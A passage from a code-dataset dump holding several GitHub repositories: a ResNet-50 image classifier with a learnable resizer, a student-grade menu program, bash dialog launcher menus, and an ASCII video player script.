ascii_characters = pixels_to_ascii(greyscale(resize_image(image))) # get ascii characters\n pixel_count = len(ascii_characters)\n ascii_image = \"\\n\".join(\n [ascii_characters[index:(index + frame_size)] for index in range(0, pixel_count, 
frame_size)])\n file_name = r\"TextFiles/\" + \"bad_apple\" + str(current_frame) + \".txt\"\n try:\n with open(file_name, \"w\") as f:\n f.write(ascii_image)\n except FileNotFoundError:\n continue\n current_frame += 1\n\n\ndef preflight_operations(path):\n if os.path.exists(path):\n path_to_video = path.strip()\n cap = cv2.VideoCapture(path_to_video)\n total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n cap.release()\n\n video = mp.VideoFileClip(path_to_video)\n path_to_audio = 'audio.mp3'\n video.audio.write_audiofile(path_to_audio)\n\n frames_per_process = int(total_frames / 4)\n\n process1_end_frame = frames_per_process\n process2_start_frame = process1_end_frame + 1\n process2_end_frame = process2_start_frame + frames_per_process\n process3_start_frame = process2_end_frame + 1\n process3_end_frame = process3_start_frame + frames_per_process\n process4_start_frame = process3_end_frame + 1\n process4_end_frame = total_frames - 1\n\n start_time = time.time()\n sys.stdout.write('Beginning ASCII generation...\\n')\n extract_transform_generate(path_to_video, 1, process4_end_frame)\n execution_time = time.time() - start_time\n sys.stdout.write('ASCII generation completed! ASCII generation time: ' + str(execution_time))\n\n return total_frames\n\n else:\n sys.stdout.write('Warning file not found!\\n')\n\n\ndef main():\n while True:\n sys.stdout.write('==============================================================\\n')\n sys.stdout.write('Select option: \\n')\n sys.stdout.write('1) Play\\n')\n sys.stdout.write('2) Exit\\n')\n sys.stdout.write('==============================================================\\n')\n\n user_input = str(input(\"Your option: \"))\n user_input.strip() # removes trailing whitespaces\n\n if user_input == '1':\n user_input = str(input(\"Please enter the video file name (file must be in root!): \"))\n total_frames = preflight_operations(user_input)\n play_audio('audio.mp3')\n play_video(total_frames=total_frames)\n elif user_input == '2':\n exit()\n continue\n else:\n sys.stdout.write('Unknown input!\\n')\n continue\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7488372325897217,
"alphanum_fraction": 0.7627906799316406,
"avg_line_length": 60.42856979370117,
"blob_id": "fba70e5462a7611ac882d9175f3988c79c932126",
"content_id": "15896e8ec77a0b588c33d4a19a475b76142f3ab0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 237,
"num_lines": 7,
"path": "/README.md",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "# PythonProjects\nPython projects. Going to post stuff like an \"app store\" I created. ONLY PYTHON PROJECTS WILL BE POSTED IN THIS REPOSITORY.\n\n1. Terminal is out now!\n2. Barrel OS 1.0 is out!\n\nNote: Ignore the message: \"YOU HAVE BEEN INFECTED HAHAHAHA !!!\" it's just coming from an annoying program I made looking at a tutorial for how to make a harmless virus. I am going to delete that file and remove the message in update 1.1.\n"
},
{
"alpha_fraction": 0.7111111283302307,
"alphanum_fraction": 0.7629629373550415,
"avg_line_length": 8,
"blob_id": "a05b6b7d4aa437a65cc09693337abb3cdbae3e45",
"content_id": "eb663306bd0c9935f9c06bbabe7e27d8f2fa1bcf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 15,
"path": "/othergames.sh",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "clear\n\npython3 -m pip install freegames\n\nclear\n\npython3 -m freegames --help\n\nsleep 10\nclear\n\npython3 -m freegames list\n\nsleep 10\nclear\n"
},
{
"alpha_fraction": 0.6375218629837036,
"alphanum_fraction": 0.6602548360824585,
"avg_line_length": 24.018749237060547,
"blob_id": "4a4f4e8763e65eb721a2dfe355b71aa0bb4e8615",
"content_id": "86700af3269664c20748152e6fcbef8ccb4cde95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4003,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 160,
"path": "/simulator.py",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "import psutil\nimport time\nimport os\n\n\nlist = ['---', 'python3', 'idle']\n\nprint('This simulator does not contain any databases, and thus data will NOT be saved.')\n\nter = input('bash@user: ')\n#strter = ter.split()[1]\n\n\nif ter == 'cpu':\n print('Collecting cpu data...')\n print('cpu percentage:',psutil.cpu_percent())\n print('RAM:',psutil.virtual_memory())\n print('RAM (dict):',dict(psutil.virtual_memory()._asdict()))\n print('RAM (percent):',psutil.virtual_memory().percent)\n print('total percentage of available memory:',psutil.virtual_memory().available * 100 / psutil.virtual_memory().total)\n \nelif ter == 'pip installed':\n print('running setup...')\n time.sleep(0.1)\n print('loading list...')\n time.sleep(0.1)\n print('Warning: This feature will only work on a terminal.')\n print('pip installed modules:')\n os.system('pip list')\n\n\nelif ter == 'pip3 installed':\n print('Fetching new data...')\n time.sleep(0.1)\n print('Warning: This feature will only work on a terminal.')\n print('pip3 installed modules:')\n os.system('pip3 list')\n \nelif ter == 'install ' + list[1]:\n os.system('sudo apt-get install python3')\n\nelif ter == 'install ' + list[2]:\n os.system('sudo apt-get install idle')\n \nelif ter == 'delete' + list[1]:\n os.system('sudo apt-get remove python3')\n \nelif ter == 'delete' + list[2]:\n os.system('sudo apt-get remove idle')\n\nelif ter == 'open':\n\tfilename = input('File to open: ')\n\ttry:\n\t\tos.system(f\"nano {filename}\")\n\n\texcept:\n\t\tclass bcolors:\n \t\t\tHEADER = '\\033[95m'\n \t\t\tOKBLUE = '\\033[94m'\n \t\t\tOKCYAN = '\\033[96m'\n \t\t\tOKGREEN = '\\033[92m'\n\t \t\tWARNING = '\\033[93m'\n\t \t\tFAIL = '\\033[91m'\n\t \t\tENDC = '\\033[0m'\n\t \t\tBOLD = '\\033[1m'\n\t \t\tUNDERLINE = '\\033[4m'\n\n\t\tprint(f\"{bcolors.FAIL}Failed to open file, contact [email protected] for crash report.{bcolors.ENDC}\")\n\n\nelif ter == 'install':\n\tprint(\"\"\"\n\ninstall [APPLICATION]\ndelete [APPLICATION]\n\n\n\"\"\")\n\nelif ter == 'delete':\n\tprint(\"\"\"\n\ndelete [APPLICATION]\ninstall [APPLICATION]\n\n\n\"\"\")\n\n\nelif ter == 'ver' or ter == 'version':\n\tprint(\"\"\"\n\nBARREL OS VER: v1.0\n\nTHIS IS A FREE SIMULATION OF SOFTWARE.\nJUST GIVE CREDIT TO ORIGINAL CREATOR, AND YOU ARE FREE TO MAKE DIFFERENT DISTRIBUTIONS.\nCONTACT: [email protected] FOR MORE INFORMATION.\n\"\"\")\n\nelif ter == 'help':\n\tprint('''\n\ncpu - prints cpu data\nallinfo - prints all hardware and software data (stats for nerds)\npip installed - prints a list of all the installed modules using pip\npip3 installed - prints a list of all the installed modules using pip3\ninstall - installs the application\ndelete - deletes the application\nopen - opens a file\necho - the 'print' function in python\nshutdown - shuts down linux/raspbian\nver - prints version of this simulator\nhelp - displays this help message\n\n''')\n\nelif ter == 'allinfo':\n\tprint(psutil.cpu_times())\n\tprint(psutil.cpu_percent(1))\n\tprint(\"Number of cores in system\", psutil.cpu_count())\n\tprint(\"\\nNumber of physical cores in system\",)\n\tprint(\"CPU Statistics\", psutil.cpu_stats())\n\tprint(psutil.cpu_freq())\n\tprint(psutil.getloadavg())\n\tprint(psutil.virtual_memory())\n\tprint(psutil.swap_memory())\n\tprint(psutil.disk_partitions())\n\tprint(psutil.disk_usage('/'))\n\tprint(psutil.net_io_counters())\n\tprint(psutil.net_connections())\n\tprint(psutil.net_if_addrs())\n\tprint(psutil.sensors_temperatures())\n\tprint(psutil.sensors_fans())\n\tclass bcolors:\n\t\tWARNING = 
'\\033[93m'\n\t\tFAIL = '\\033[91m'\n\t\tENDC = '\\033[0m'\n\t\tBOLD = '\\033[1m'\n\t\tUNDERLINE = '\\033[4m'\n\n\tprint(f\"{bcolors.WARNING}WARNING: BATTERY CHECK MAY NOT WORK ON SOME DEVICES.{bcolors.ENDC}\")\n\tprint(psutil.sensors_battery())\n\tprint(psutil.boot_time())\n\tprint(psutil.users())\n\t\nelif ter == 'shutdown':\n\tprint(\"Shutdown begins in 3 seconds\")\n\ttime.sleep(3)\n\tos.system(\"sudo shutdown -h now\")\n\nelif ter == 'echo':\n\techo = input(\"What would you like to print? \")\n\tprint(echo)\n\nelif ter == 'update':\n\tprint(\"Updating simulator...\")\n\texec(open(\"update.py\").read())\n\nelse:\n print(\"-bash: '\" + ter + \"': command not found\")\n"
}
] | 8 |
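The heart of asciivideo.py above is the intensity-to-character mapping ASCII_CHARS[pixel // 25]: an 8-bit greyscale value bucketed into an 11-entry ramp, since 255 // 25 == 10 is the last valid index. The mapping on its own, with a few sample intensities (the helper name pixel_to_char is illustrative, not from the file):

ASCII_CHARS = ["@", "#", "S", "%", "?", "*", "+", ";", ":", ",", " "]

def pixel_to_char(value):
    # 0 (black) -> "@" ... 255 (white) -> " "; integer division by 25
    # buckets the 0-255 range into the 11 ramp positions.
    return ASCII_CHARS[value // 25]

print("".join(pixel_to_char(v) for v in (0, 64, 128, 192, 255)))  # "@S*; "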
masterfulEJ/pythonProjects
|
https://github.com/masterfulEJ/pythonProjects
|
c0af8f8e71e01d2b378a1b9a5e6ec2d9e142951c
|
72c4e90e7966a393522355287a181c9d1e902ac1
|
49065b6c808c17a77f7f8101a6f90c5fe6efe48a
|
refs/heads/master
| 2021-01-23T18:58:12.781782 | 2018-06-24T09:50:50 | 2018-06-24T09:50:50 | 83,006,116 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6814461350440979,
"alphanum_fraction": 0.6974761486053467,
"avg_line_length": 31.701148986816406,
"blob_id": "1abb19e793d2d21d07a33c1ae5e5038e6590e508",
"content_id": "fda6ba4b03d1cf31e56c85ae17fc979cb6090229",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2932,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 87,
"path": "/SGTrip/LSTM/lstm.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "import numpy\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport math\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import LSTM\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\r\n# convert an array of values into a dataset matrix\r\ndef create_data(dataset, look_back=1):\r\n dataX, dataY = [], []\r\n for i in range(len(dataset)-look_back):\r\n a = dataset[i:(i+look_back), 0]\r\n dataX.append(a)\r\n dataY.append(dataset[i + look_back, 0])\r\n\r\n return numpy.array(dataX), numpy.array(dataY)\r\n\r\n# fix random seed for reproducibility\r\nnumpy.random.seed(7)\r\n\r\n# load the dataset\r\ndataframe = pd.read_excel('us_gdp.xlsx', index_col=0)\r\nplt.figure()\r\nplt.plot(dataframe)\r\ndataset = dataframe.values\r\n\r\nlook_back = 5\r\nX, Y = create_data(dataset, look_back)\r\nlasta = dataset[len(dataset)-look_back:len(dataset), 0]\r\nX = numpy.vstack([X, numpy.reshape(lasta, (1, lasta.shape[0]))])\r\n\r\n# split into train and test sets\r\ntrain_size = int(len(Y) * 0.67)\r\ntest_size = len(Y) - train_size\r\ntrainX, testX, testX1 = X[:train_size, :], X[train_size:len(Y), :], X[train_size:(len(Y)+1), :]\r\ntrainY, testY = Y[:train_size], Y[train_size:len(Y)]\r\n\r\n\r\n# create and fit the LSTM network\r\nmodel = Sequential()\r\n#model.add(Dense(2, input_dim=look_back))\r\ntrainX = numpy.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))\r\ntestX = numpy.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\r\ntestX1 = numpy.reshape(testX1, (testX1.shape[0], 1, testX1.shape[1]))\r\nmodel.add(LSTM(2, input_dim=look_back))\r\nmodel.add(Dense(1))\r\nmodel.compile(loss='mse', optimizer='adam')\r\nprint(model.summary())\r\nres = model.fit(trainX, trainY, nb_epoch=100, batch_size=10)\r\n\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['loss'])\r\nplt.show()\r\n\r\n# make predictions\r\ntrainPredict = model.predict(trainX)\r\ntestPredict = model.predict(testX)\r\ntestPredict1 = model.predict(testX1)\r\n\r\n# calculate root mean squared error\r\ntrainScore = math.sqrt(mean_squared_error(trainY, trainPredict[:, 0]))\r\nprint('Train Score: %.2f RMSE' % (trainScore))\r\ntestScore = math.sqrt(mean_squared_error(testY, testPredict[:, 0]))\r\nprint('Test Score: %.2f RMSE' % (testScore))\r\n\r\n# shift train predictions for plotting\r\ntrainPredictPlot = numpy.empty_like(dataset)\r\ntrainPredictPlot[:, :] = numpy.nan\r\ntrainPredictPlot[(look_back-1):len(trainPredict)+(look_back-1), :] = trainPredict\r\n\r\n# shift test predictions for plotting\r\ntestPredictPlot = numpy.empty_like(dataset)\r\ntestPredictPlot[:, :] = numpy.nan\r\ntestPredictPlot[(len(trainPredict)+(look_back-1)):, :] = testPredict1\r\n\r\n# plot baseline and predictions\r\ndataframe['train'] = pd.DataFrame(trainPredictPlot, index=dataframe.index)[0]\r\ndataframe['test'] = pd.DataFrame(testPredictPlot, index=dataframe.index)[0]\r\ndataframe.plot()\r\nplt.show()\r\n\r\nplt.figure()\r\nplt.plot(dataframe['train'] - dataframe['US GDP YoY'])\r\nplt.plot(dataframe['test'] - dataframe['US GDP YoY'])\r\n"
},
{
"alpha_fraction": 0.6216216087341309,
"alphanum_fraction": 0.6351351141929626,
"avg_line_length": 22.33333396911621,
"blob_id": "d465ebb6b2ef691727193e79977098d5553799c0",
"content_id": "ac1903e865da92afcc0a74b149c58d9f019a881b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 148,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 6,
"path": "/SGTrip/path.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\nyour_local_folder = 'D:/...'\r\nimport sys\r\nsys.path.insert(0, your_local_folder)\r\nimport os\r\nos.chdir(your_local_folder)\r\n\r\n"
},
{
"alpha_fraction": 0.6618942618370056,
"alphanum_fraction": 0.6844713687896729,
"avg_line_length": 24.28985595703125,
"blob_id": "37d2ba2e8caa1a900961b4d6d1bd91e13c603363",
"content_id": "fab0f3e077b4ad504621746af51295fd1ab15efc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1816,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 69,
"path": "/SGTrip/MNIST/MNIST_data.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\r\n__author__ = 'fgu041513'\r\n\r\nimport pickle\r\nimport gzip\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n# LOADING\r\nfilename=\"mnist.pkl.gz\"\r\n\r\nwith gzip.open(filename, 'rb') as f:\r\n u = pickle._Unpickler(f)\r\n u.encoding = 'latin1'\r\n training_data, validation_data, test_data = u.load()\r\n\r\nprint(training_data[0].__len__())\r\nprint(validation_data[0].__len__())\r\nprint(test_data[0].__len__())\r\n\r\n\r\n# VISUALIZE DATA\r\ni = 0\r\nexample = training_data[0][i]\r\nexample = np.reshape(example, (28, 28))\r\nplt.imshow(example, interpolation='nearest', cmap='Greys')\r\nplt.title(training_data[1][i])\r\nplt.show()\r\ni += 1\r\n\r\n\r\n# NEURAL NETWORK\r\n# Convert Y to dummy\r\nfrom keras.utils import np_utils\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Convolution2D\r\nfrom keras.regularizers import WeightRegularizer\r\n\r\ndata = training_data\r\nX = data[0]\r\nY = np_utils.to_categorical(data[1])\r\nXvalid = validation_data[0]\r\nYvalid = np_utils.to_categorical(validation_data[1])\r\ninput_dim = X[0].shape[0]\r\noutput_dim = 10\r\n\r\nW_regularizer = WeightRegularizer(l1=0., l2=0.)\r\nmodel = Sequential()\r\nmodel.add(Dense(30, input_dim=input_dim, name='hidden_layer', activation='sigmoid', W_regularizer=W_regularizer))\r\nmodel.add(Dense(output_dim, name='output_layer', activation='softmax'))\r\n\r\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])\r\nprint(model.summary())\r\n# fit\r\nres = model.fit(X, Y, batch_size=10, nb_epoch=10, validation_data=(Xvalid, Yvalid))\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['loss'])\r\n\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['acc'])\r\nplt.plot(res.epoch, res.history['val_acc'])\r\n\r\n# predict\r\ndata = test_data\r\nX = data[0]\r\nY = data[1]\r\nYhat = model.predict(X)\r\n\r\nprint(np.mean(np.argmax(Yhat, axis=1) == Y))\r\n\r\n"
},
{
"alpha_fraction": 0.6315789222717285,
"alphanum_fraction": 0.6804511547088623,
"avg_line_length": 22.18181800842285,
"blob_id": "2390c51be2875bc350c162f2c3b6342f932d46de",
"content_id": "3d02fc79a2ac405e50c769debaf08bfa326d84ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 266,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 11,
"path": "/DeepLearningSC/sg_step1.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "\"\"\" TEST Network for Demonstration \"\"\"\r\n\r\nimport mnist_loader\r\nimport network\r\n\r\ntraining_data, validation_data, test_data = \\\r\n mnist_loader.load_data_wrapper()\r\n\r\nnet = network.Network([784, 30, 10])\r\n\r\nnet.SGD(training_data, 30, 10, 3.0, test_data=test_data)\r\n"
},
{
"alpha_fraction": 0.6477832794189453,
"alphanum_fraction": 0.6588670015335083,
"avg_line_length": 24.19354820251465,
"blob_id": "31b5486d973edac2a39e057731d65a975ae88f50",
"content_id": "1df033913f4f4290c03dbbff3d0411a28e0e616c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1624,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 62,
"path": "/README.md",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "## pythonProjects ##\r\n----------\r\nPersonal python learning projects\r\n\r\n\r\n### Note: Performance metrics for regression model\r\n\r\nHere are three common evaluation metrics for regression problems:\r\n\r\n**Mean Absolute Error** (MAE) is the mean of the absolute value of the errors:\r\n\r\n$$\\frac 1n\\sum_{i=1}^n|y_i-\\hat{y}_i|$$\r\n\r\n**Mean Squared Error** (MSE) is the mean of the squared errors:\r\n\r\n$$\\frac 1n\\sum_{i=1}^n(y_i-\\hat{y}_i)^2$$\r\n\r\n**Root Mean Squared Error** (RMSE) is the square root of the mean of the squared errors:\r\n\r\n$$\\sqrt{\\frac 1n\\sum_{i=1}^n(y_i-\\hat{y}_i)^2}$$\r\n\r\n**Integral Example**\r\n$$\r\n\\Gamma(z) = \\int_0^\\infty t^{z-1}e^{-t}dt\\,.\r\n$$\r\n\r\n### UML diagrams\r\n\r\nYou can also render sequence diagrams like this:\r\n\r\n```sequence\r\nAlice->Bob: Hello Bob, how are you?\r\nNote right of Bob: Bob thinks\r\nBob-->Alice: I am good thanks!\r\n```\r\n\r\nAnd flow charts like this:\r\n\r\n```flow\r\nst=>start: Start\r\ne=>end\r\nop=>operation: My Operation\r\ncond=>condition: Yes or No?\r\n\r\nst->op->cond\r\ncond(yes)->e\r\ncond(no)->op\r\n```\r\n\r\n> **Note:** You can find more information:\r\n\r\n> - about **Sequence diagrams** syntax [here][7],\r\n> - about **Flow charts** syntax [here][8].\r\n\r\n### Support StackEdit\r\n\r\n[](https://monetizejs.com/authorize?client_id=ESTHdCYOi18iLhhO&summary=true)\r\n\r\n [^stackedit]: [StackEdit](https://stackedit.io/) is a full-featured, open-source Markdown editor based on PageDown, the Markdown library used by Stack Overflow and the other Stack Exchange sites.\r\n\r\n [7]: http://bramp.github.io/js-sequence-diagrams/\r\n [8]: http://adrai.github.io/flowchart.js/\r\n"
},
{
"alpha_fraction": 0.5991405844688416,
"alphanum_fraction": 0.6089625358581543,
"avg_line_length": 32.65957260131836,
"blob_id": "23286eb7df2264ca815e5f7810205ffc5885ba1c",
"content_id": "0339be3edb2ca1cc7e3a436173e522607fdaa9d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1629,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 47,
"path": "/SM/gp_utils.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import colors, ticker, cm\r\nfrom matplotlib.mlab import bivariate_normal\r\n#from numpy.linalg import inv\r\n\r\n# Function to get the GP solution\r\n\r\n\r\ndef gp_solve(x_train, y_train, x_pred, kernel, sig_noise=0, **kwargs):\r\n k_xx = kernel(x_train, x_train, **kwargs)\r\n k_x_xp = kernel(x_train, x_pred, **kwargs)\r\n k_xp_x = kernel(x_pred, x_train, **kwargs)\r\n k_xp_xp = kernel(x_pred, x_pred, **kwargs)\r\n\r\n Vinv = np.linalg.inv(k_xx + (sig_noise**2) * np.identity(len(k_xx)))\r\n mu = np.dot(np.dot(k_xp_x, Vinv), y_train)\r\n var = k_xp_xp - np.dot(np.dot(k_xp_x, Vinv), k_x_xp)\r\n\r\n return mu, var\r\n\r\n# function to plot the GP solution\r\n\r\n\r\ndef gp_plot(x, y, x_pred, mu_pred, cov_pred, n_sample=0, main=\"\"):\r\n\r\n se_pred = 2 * np.sqrt(np.diag(cov_pred))\r\n # plot samples from the posterior\r\n # (this can be misleading, we don't actually have the function, we have draws from an MvN using the learned mean and covariance of the function)\r\n for i in range(n_sample):\r\n samp_y = np.squeeze(\r\n np.random.multivariate_normal(mu_pred, cov_pred, 1))\r\n plt.plot(x_pred, samp_y, 'red', alpha=0.3)\r\n # plot the mean\r\n plt.plot(x_pred, mu_pred, 'red', alpha=0.7)\r\n # plot the observations\r\n plt.plot(x, y, 'o', markersize=3, color='blue', alpha=0.5)\r\n # plot prediction uncertainty\r\n plt.fill_between(x_pred, mu_pred - se_pred, mu_pred +\r\n se_pred, color='pink', alpha=0.7)\r\n plt.grid(alpha=0.2)\r\n plt.title(main)\r\n\r\n\r\nif __name__ == '__main__':\r\n gp_solve()\r\n gp_plot()\r\n"
},
{
"alpha_fraction": 0.4749999940395355,
"alphanum_fraction": 0.5415493249893188,
"avg_line_length": 27.58333396911621,
"blob_id": "47c13598b79717b1527821fb825e48dfc2da90d0",
"content_id": "1f2cbc90905b46fc20e1dae7f079ba5360ea5da8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2840,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 96,
"path": "/SM/kernel_functions.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\n\r\n# linear kernel\r\ndef kfunc_linear(x1, x2, h=1, l=0):\r\n #print('kfunc_linear')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return (h * (X1-l) * (X2-l)).T\r\ndef kfunc_linear2(x1, x2, l=1):\r\n #print('kfunc_martern')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return np.abs(X1-X2).T\r\ndef kfunc_lin(x1, x2, b=0, v=1, c=0):\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return (b**2 + v**2 * (X1-c) * (X2-c)).T\r\n\r\n# exponential kernel\r\ndef kfunc_exp(x1, x2, l=1):\r\n #print('kfunc_exp')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return np.exp(-1 * np.abs(X1-X2)).T\r\n\r\n# squared exponential kernel\r\ndef kfunc_exp_sq(x1, x2, l=1):\r\n #print('kfunc_exp_sq')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return np.exp(-0.5 * np.abs((X1-X2)/l)**2).T\r\n\r\n# browninan kernel\r\ndef kfunc_brown(x1, x2, l=1):\r\n #print('kfunc_brown')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return np.minimum(X1, X2).T\r\n\r\n# matern kernel\r\ndef kfunc_matern(x1, x2, l=1):\r\n #print('kfunc_martern')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return ((1 + np.abs(X1-X2)) * np.exp(-1 * np.abs(X1-X2))).T\r\n\r\n# gaussian kernel\r\ndef kfunc_gauss(x1, x2, l=1):\r\n #print('kfunc_gauss')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return np.exp(-0.5 * np.abs((X1-X2)/l)**2).T\r\n\r\n# sin kernel\r\ndef kfunc_sinc(x1, x2, l=1):\r\n #print('kfunc_sinc')\r\n X1, X2 = np.meshgrid(x1, x2)\r\n Sigma = (np.sin(np.abs(X1-X2))/np.abs(X1-X2)).T\r\n np.fill_diagonal(Sigma, 1)\r\n return Sigma\r\n\r\n# squared exponential kernel\r\ndef kfunc_se(x1, x2, h=1, l=1):\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return h**2 * np.exp(-1 * ((X1-X2)/l)**2).T\r\n\r\n# rational quadratic kernel\r\ndef kfunc_rq(x1, x2, h=1, l=1, a=0.5):\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return h**2 * ((1 + ((X1-X2)**2)/(a*l**2))**(-a)).T\r\n\r\n# periodicic kernel\r\ndef kfunc_per(x1, x2, h=1, l=1, p=2):\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return h**2 * np.exp(-2/l**2 * np.sin(np.pi * np.abs((X1-X2)/p))**2).T\r\n #return h**2 * (np.exp(-2/l * np.sin(np.pi * np.abs((X1-X2)/p)))**2).T\r\n\r\n# locally periodicic kernel\r\ndef kfunc_local_per(x1, x2, h=1, l1=1, p=1, l2=1):\r\n X1, X2 = np.meshgrid(x1, x2)\r\n return h**2 * (np.exp(-2/l1**2 * np.sin(np.pi * np.abs((X1-X2)/p))**2) * np.exp(-1 * ((X1-X2)/l2)**2)).T\r\n\r\ndef kfunc_per_add_lin(x1, x2, h, l, p, b, v, c):\r\n return kfunc_per(x1, x2, h, l, p) + kfunc_lin(x1, x2, b, v, c)\r\n\r\ndef kfunc_per_add_lin_gauss(x1, x2, h, l, p, b, v, c, gh, gl):\r\n return kfunc_per(x1, x2, h, l, p) + kfunc_lin(x1, x2, b, v, c) + kfunc_se(x1, x2, gh, gl)\r\n\r\nif __name__ == '__main__':\r\n kfunc_linear()\r\n kfunc_linear2()\r\n kfunc_lin()\r\n kfunc_exp()\r\n kfunc_exp_sq()\r\n kfunc_brown()\r\n kfunc_matern()\r\n kfunc_gauss()\r\n kfunc_sinc()\r\n kfunc_se()\r\n kfunc_rq()\r\n kfunc_per()\r\n kfunc_local_per()\r\n kfunc_per_add_lin()\r\n kfunc_per_add_lin_gauss()\r\n"
},
{
"alpha_fraction": 0.7051181197166443,
"alphanum_fraction": 0.7137795090675354,
"avg_line_length": 24.45833396911621,
"blob_id": "ac6abf6899844b0780d9c9423567482c939ee9a1",
"content_id": "48af5cc1fad70aaf2a7e61882ef0dc442b3d5443",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2540,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 96,
"path": "/SGTrip/Autoencoders/autoencoders.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "from keras.layers import Input, Dense\r\nfrom keras.models import Model\r\nimport matplotlib.pyplot as plt\r\nimport copy\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nseed = 123\r\nnp.random.seed(seed)\r\n\r\ndata = pd.read_excel(\"data.xlsx\", index_col=0)\r\nprint(data.columns)\r\nplt.figure()\r\nplt.plot(data['S&P 500'])\r\nplt.show()\r\nret = data.pct_change()\r\nret = ret.ix[1:, :]\r\n\r\n#ret = expit(ret)\r\nret.to_excel(\"output/actual.xlsx\")\r\n\r\n# this is the size of our encoded representations\r\nencoding_dim = 2\r\n\r\nnr, nc = ret.shape\r\n\r\n# this is our input placeholder\r\ninput_data = Input(shape=(nc,))\r\n# \"encoded\" is the encoded representation of the input\r\nencoded = Dense(encoding_dim, activation='linear')(input_data)\r\n# \"decoded\" is the lossy reconstruction of the input\r\ndecoded = Dense(nc, activation='linear')(encoded)\r\n\r\n\r\n# this model maps an input to its reconstruction\r\nautoencoder = Model(input=input_data, output=decoded)\r\n\r\n# this model maps an input to its encoded representation\r\nencoder = Model(input=input_data, output=encoded)\r\n\r\n\r\n# create a placeholder for an encoded (m-dimensional) input\r\nencoded_input = Input(shape=(encoding_dim,))\r\n# retrieve the last layer of the autoencoder model\r\ndecoder_layer = autoencoder.layers[-1]\r\n# create the decoder model\r\ndecoder = Model(input=encoded_input, output=decoder_layer(encoded_input))\r\n\r\n\r\nautoencoder.compile(optimizer='rmsprop', loss='mse')\r\n\r\n\r\nx_train = np.array(ret)\r\nres = autoencoder.fit(x_train, x_train, nb_epoch=100, batch_size=50)\r\n\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['loss'])\r\nplt.show()\r\n\r\nencoded_series = encoder.predict(x_train)\r\ndecoded_series = decoder.predict(encoded_series)\r\n\r\nencoded_series_pd = pd.DataFrame(encoded_series)\r\n#encoded_series_pd = logit(encoded_series_pd)\r\nencoded_series_pd.to_excel(\"output/res.xlsx\")\r\n\r\ndecoded_series_pd = pd.DataFrame(decoded_series, columns=ret.columns)\r\ndecoded_series_pd.to_excel(\"output/decoded.xlsx\")\r\n\r\n\r\n# Check results\r\nold_mean = 